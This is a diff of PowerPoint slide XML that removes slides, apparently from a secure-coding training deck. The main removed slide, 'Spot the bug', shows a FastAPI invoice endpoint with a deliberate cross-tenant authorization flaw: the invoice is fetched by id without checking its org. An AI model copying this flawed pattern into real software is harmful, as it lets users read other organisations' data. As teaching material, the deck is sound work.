-          <a:srgbClr val="FFFFFF"/>
-        </a:solidFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 102"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="103" name="Google Shape;103;g3ec891ba402_1_329"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="365760"/>
-            <a:ext cx="10728600" cy="585000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Spot the bug</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="104" name="Google Shape;104;g3ec891ba402_1_329"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9601200" y="1188720"/>
-            <a:ext cx="1828800" cy="523200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="5B21B6"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>Python (FastAPI)</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="105" name="Google Shape;105;g3ec891ba402_1_329"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731525" y="1188725"/>
-            <a:ext cx="10728600" cy="5131800"/>
-          </a:xfrm>
-          <a:prstGeom prst="roundRect">
-            <a:avLst>
-              <a:gd name="adj" fmla="val 16667"/>
-            </a:avLst>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="F0F0F4"/>
-          </a:solidFill>
-          <a:ln w="12700" cap="flat" cmpd="sng">
-            <a:solidFill>
-              <a:srgbClr val="EEEEF0"/>
-            </a:solidFill>
-            <a:prstDash val="solid"/>
-            <a:round/>
-            <a:headEnd type="none" w="sm" len="sm"/>
-            <a:tailEnd type="none" w="sm" len="sm"/>
-          </a:ln>
-          <a:effectLst>
-            <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
-              <a:srgbClr val="000000">
-                <a:alpha val="34900"/>
-              </a:srgbClr>
-            </a:outerShdw>
-          </a:effectLst>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:schemeClr val="dk1"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-              <a:ea typeface="Calibri"/>
-              <a:cs typeface="Calibri"/>
-              <a:sym typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="106" name="Google Shape;106;g3ec891ba402_1_329"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1005865" y="1342495"/>
-            <a:ext cx="10179900" cy="5515500"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t># Multi-tenant app. Each org has invoices. You must be a </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>member of an org to view its invoices.</a:t>
-            </a:r>
-            <a:endParaRPr sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>@app.get("/orgs/{org_id}/invoices/{invoice_id}")</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>def get_invoice(org_id: int,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>invoice_id: int,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>user: User = Depends(current_user)):</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    with engine.begin() as conn:</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        member = conn.execute(</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            text("""</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>                SELECT 1 FROM memberships</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>                WHERE org_id = :org AND user_id = :uid</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            """),</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            {"org": org_id, "uid": user.id},</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        ).first()</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        if member is None:</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            raise HTTPException(403)        # not in this org</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        invoice = conn.execute(</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            text("SELECT * FROM invoices WHERE id = :id"),</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            {"id": invoice_id},</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        ).first()</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    if invoice is None:</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        raise HTTPException(404)</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    return dict(invoice._mapping)</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
 <file path=ppt/slides/slide30.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -34351,696 +32158,6 @@
               <a:t>Build it</a:t>
             </a:r>
             <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:solidFill>
-          <a:srgbClr val="FFFFFF"/>
-        </a:solidFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 111"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="112" name="Google Shape;112;g3ec891ba402_1_337"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="365760"/>
-            <a:ext cx="10728600" cy="585000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Spot the bug #4: the exploit and the fix</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="113" name="Google Shape;113;g3ec891ba402_1_337"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9601200" y="1188720"/>
-            <a:ext cx="1828800" cy="523200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
